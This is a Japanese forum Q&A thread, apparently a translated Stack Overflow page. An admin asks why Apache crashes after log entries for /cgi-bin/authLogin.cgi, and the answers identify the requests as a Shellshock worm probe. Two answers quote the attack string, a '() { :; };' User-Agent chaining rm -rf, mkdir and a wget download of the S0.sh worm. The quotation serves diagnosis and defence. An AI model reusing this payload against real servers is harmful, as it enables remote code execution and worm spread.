1

よう皆、

WindowsサーバーデータセンターでAmppsサーバーをphp 5.3.29で使用しています。

残念ながら、Windowsサーバーで次のプロンプトが表示され、サイトがダウンしています。

プロンプトのタイトル: Microsoft Windows

プロンプト メッセージ: Apache http サーバーが動作を停止しました。

問題が発生したため、プログラムが正しく動作しなくなりました。Windows はプログラムを終了し、解決策があるかどうかを通知します。

痕跡:

エラーログとアクセスログをたどったところ、原因として以下のログが見つかりました。

Apache アクセス ログ:

202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335 217.248.177.30 - - [10/Dec/2014:06: 11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335 209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin .cgi HTTP/1.1" 404 1335 81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335

Apache エラー ログ:

[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] スクリプトが見つからないか、stat できません: D:/Program Files/Ampps/www/cgi -bin/authLogin.cgi

私を助けてください。

4

4 に答える 4

1

S0.py のようなものを wget して実行できるように権限を取得しようとする Web ボットがありますが、これはワームであり、ダウンロード サーバーが危険にさらされていると思います。S0.sh のコピーを取得した場合は、exploit-db などに渡してください。巧妙なコマンドは次のとおりです。 Get /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

ファイルはダウンロード後に実行されます。HDB_DATA について何かがあると思いますが、それは私も持っていません。「情報は最重要!」

于 2014-12-16T03:06:57.733 に答える
0

このファイルを開こうとすると、どうなりますか?

D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi

このメッセージは、404 エラーと「スクリプトが見つかりません」というメッセージで示されるように、ファイルが存在しないことを示しています。

于 2014-12-10T13:12:14.533 に答える
0

最後に、これらのクライアントが cgi-bin ディレクトリにアクセスすることを拒否しました。

cgi-bin ディレクトリに .htaccess ファイルを作成しました

.htaccess に次の行を追加しました

すべてから拒否します。

于 2014-12-10T13:51:22.347 に答える
0

authLogin.cgi は、誰かが実行できるようになる可能性があることを除けば、それほど重要ではないと思います。問題は、ユーザーが /tmp/S0.sh を削除しようとするか、または削除に成功し、共有フォルダーにディレクトリ php を作成してから wget を実行することです。

/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

いろいろ考えた末に思いついたのがこちらです: http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html

「S0.sh は 2 つの主要部分で構成されています。最初の部分は初期設定を行い、追加のプログラムをダウンロードします。次に、2 番目の部分はワームをインストールし、いくつかの追加コマンドを実行します。」

したがって、このアクションをキャッチするのは本当に楽しみであり、最初は誰もそれをシェルショックと呼ぶことを知りませんでした. そこには S0.sh のコピーがあり、それがワームであることがわかります。

私が読んだ限りでは、このワームは IP 空間をブラウジングして、ポート 8080 をリッスンしている人を探しているだけです。

于 2016-11-14T01:01:59.940 に答える